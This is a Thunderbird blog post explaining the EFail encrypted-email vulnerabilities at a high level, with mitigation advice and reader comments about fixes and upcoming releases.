Download Thunderbird Donate

EFail and Thunderbird, What You Need To Know

Ryan Sipes 16 responses

Yesterday, researchers and the press shared information describing security vulnerabilities that would enable an attacker to gain access to the plaintext of encrypted Emails. To understand how this happens, the researchers who uncovered EFail provide a good description on their website:

In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

How to know if you’re affected

You’re affected only if you:

How to protect yourself


DO NOT DISABLE ENCRYPTION. We’ve seen recommendations from some outlets to stop using encrypted Email altogether. If you are sending sensitive data via Email, Thunderbird still recommends using encryption to keep those messages safe. You should, however, check the configuration of the applications you use to view encrypted EMail. For Thunderbird, follow our guidelines below to protect yourself.

Until Thunderbird 52.8 and 52.8.1 are released with fixes:

Most of the EFail bugs require a back-channel and require the attacker to send a manipulated Email to you, which contains part of a previously obtained encrypted message. It is also worth noting that clicking content in the Email can also allow for a back-channel (until the fixes are live).

Enigmail version 2.0.3 also shows a warning now, which should help you be aware if you are affected.

 

Tags: efail enigmail security

16 responses

Ben Bucksch wrote on

I’m working on a fix as I type this.

The best mitigation right now is View | Message body as | Simple HTML.

That stops this bug, and many others as well. It was specifically created to avoid entire classes of attacks, so it’s good to leave it enabled even when there is a specific fix for this bug, as it should protect against other future problems as well.

Óvári wrote on

Can you please advise the status of the build engineer?
https://blog.mozilla.org/thunderbird/2018/03/were-hiring-a-build-engineer/
Thank you

victorhck wrote on

Thanks for your answers…
I’ll keep using plain-emails in Thunderbird with Enigmail, updated to latest version in my GNU/Linux system…

Happy hackin’!

HeptaSean wrote on

The efail paper says on page 11 that Thunderbird allows exfiltration without user interaction.

On pages 20 and 21 the authors provide more detail and claim that they successfully used a ” tag to bypass remote content blocking.

Doesn’t that contradict your claim that disabling remote content is enough to protect against efail attacks?

Ryan Sipes wrote on

This may have been the case when the report was made, but as of 52.7 (our current release), this has been fixed.

yrro wrote on

Does the default include links with the rel=”preconnect” attribute?

Ryan Sipes wrote on

This was patched with the last release, 52.7.

Tree wrote on

I thought stable Thunderbird 60 was coming out yesterdary. Any ETA?

Ryan Sipes wrote on

Right now it is looking like early June.

Óvári wrote on

Thunderbird 60.0 Beta is available at:
https://www.thunderbird.net/channel/


Below is an approximate outline and order of our plans for the next few months:
* release 52.8.0 (released at https://www.thunderbird.net/)
* release 60.0b7, and 60.0b8 if needed, using Taskcluster build infrastructure [1]
* release 52.8.1 for security updates that were not ready for 52.8.0
* release 60.0 for manual updates only [2] (June)
* release 60.1.0 and 52.9.0 (July)
* release 60.2.0 and end of life for 52 (September)

https://groups.google.com/forum/#!topic/tb-enterprise/Kdm_dMzASuY

David J. wrote on

Hello,

I use Thunderbird (52.6.0) on a Debian stable, looking at the release sheet : https://www.thunderbird.net/en-US/thunderbird/releases/ , it looks like Thunderbird is currently in version 52.8.0.

Any recommendation on how to best keep up withe the latest stable version?

Is there anything that needs to be done on the user side? Is there any problem regarding build, build process or Debian stable package management that the community could help with in order to make sure that Thunderbird users on Debian benefits from the latest versions?

Wayne wrote on

As of Friday, version 52.8.0 is out with a good many security fixes https://www.thunderbird.net/en-US/thunderbird/52.8.0/releasenotes/

Gerald Reimer wrote on

I have tried to get Thunderbird on this S7+ apple i Phone. How do I this?

Harald Arnesen wrote on

E-mail is plain text. Period.

Greg Jaxon wrote on

E-mail is plain text. Period.

“Ascii shall receive.” (Matt 7:7)

Ironically, one defense is to encrypt your message bracketted by (respectively) ending and beginning quotes and html tag fragments to prevent the formation of URLs that embed your secret message.

Would it not suffice to insist that each part of a multipart package be self-contained (i.e. that the part-splicer cause a full exit of the parser stack for any grammar operating on the spliced parts)?

Susan Kirkland wrote on

Thank you for the notification. My IT guy will keep watch over my computer.

Comments are closed.